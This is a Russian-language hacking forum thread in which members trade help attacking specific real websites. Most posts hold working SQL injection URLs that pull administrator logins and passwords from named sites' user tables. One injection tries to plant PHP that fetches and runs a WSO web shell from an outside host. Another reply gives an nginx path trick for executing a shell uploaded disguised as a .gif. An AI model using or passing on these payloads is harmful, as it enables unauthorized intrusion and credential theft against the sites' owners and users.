Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. skM

    skM New Member

    Joined:
    27 Jun 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Файлы с тильдой на конце обычно являются файлами отката различных текстовых редакторов
     
    #16741 skM, 14 May 2011
    Last edited: 14 May 2011
    1 person likes this.
  2. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
    Почему выскакивает такая штука, и как это обойти? Спасибо.
    Вот запрос:
    Code:
    http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А не проще ли было загуглить ф-цию \ ошибку?
    Функция не может распарсить URL, потому что URL для нее невалиден.
     
    1 person likes this.
  4. lulz

    lulz Banned

    Joined:
    13 May 2011
    Messages:
    1
    Likes Received:
    3
    Reputations:
    1
    о0, хакер, ты не мог бы объяснить мне этот запрос?
    union select '<?php eval..... ?>'
    Во-первых, там нет прав, если ты планировал залить результаты выборки(читай твой зло-код эвала) селекта в файл. К томуже, твоя конструкция(без outfile, etc) ни к чему бы и не привела=/
    Во-вторых, где ты там скулю увидел?
    В-третьих, вот скуля с выводом, логин и пасс одмино.
    Code:
    http://www.sko-lotos.com/catalog.php?id=381'and(0)union select 1,concat_ws(0x3b, name, password),3,4,5,6,7 from users-- -
     
    #16744 lulz, 15 May 2011
    Last edited: 15 May 2011
    3 people like this.
  5. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если б всё было так просто. Если сервер nginx попробуй в URl набрать wso2.php.gif/.php
     
  7. skM

    skM New Member

    Joined:
    27 Jun 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    2 foozzi
    почитай вот это
     
    #16747 skM, 15 May 2011
    Last edited: 15 May 2011
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Здесь через ошибку помогите вывести:

    http://dahliasuppliers.com/noahsclassifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=11'+order+by+26+--+&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&clearoff=1
     
  9. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать? :confused:
    Code:
    http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5
    
    :rolleyes:
     
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Там нет скули.
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Как можно раскрутить это? А то не пойму, что не так с синтаксисом. Коммент ток на одну строку что ли попадает?
    http://www.fc-anji.ru/search/?search=123')))+AS+foo--+
     
    #16751 Melfis, 16 May 2011
    Last edited: 16 May 2011
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вот есть скуль:
    а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...
     
    _________________________
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Там 4ая версия. А в 4ой версии нету information_schema. И еще про это написано в статьях.
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196


    Все уже раскручено до тебя

    http://goo.gl/bxvPO
     
  15. dotMX

    dotMX New Member

    Joined:
    4 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Часто встречаю в теме sql-инъекций сообщения вида:
    Не тыкнете носом какие статьи прочитать, чтобы знать как это можно использовать?(Про залив шелла через скулю с файл-привом = Y знаю.)
    Спасибо.
     
  16. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Что не так??
     
    1 person likes this.
  17. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    И почему в 4 версии не поддерживается table_schema?!
    Как можно ещё?
    table_schema
    http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6+from+information_schema.tables+where+table_schema=0x636F6E636F7264345F6C6169746B6970657273--
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex(hex(concat(user_name,0x3a,user_pass))),3,4,5,6+from+user--+
     
    _________________________
    1 person likes this.
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Code:
    http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x3a,count(*)),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+forum_users+--+
    пустая таблица
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    во первых синтаксетическая ошибка:
    group_concat(concat_ws(0x3a3a3a,user_name,pass)+separator+0x0b)
    а должно быть:
    group_concat(concat_ws(0x3a,user_name,pass)+separator+0x0b)
    во вторых, там таблица пустая!!!
    а вообще для примера по твоей уязвимости вот пример вывода:
     
    _________________________
Thread Status:
Not open for further replies.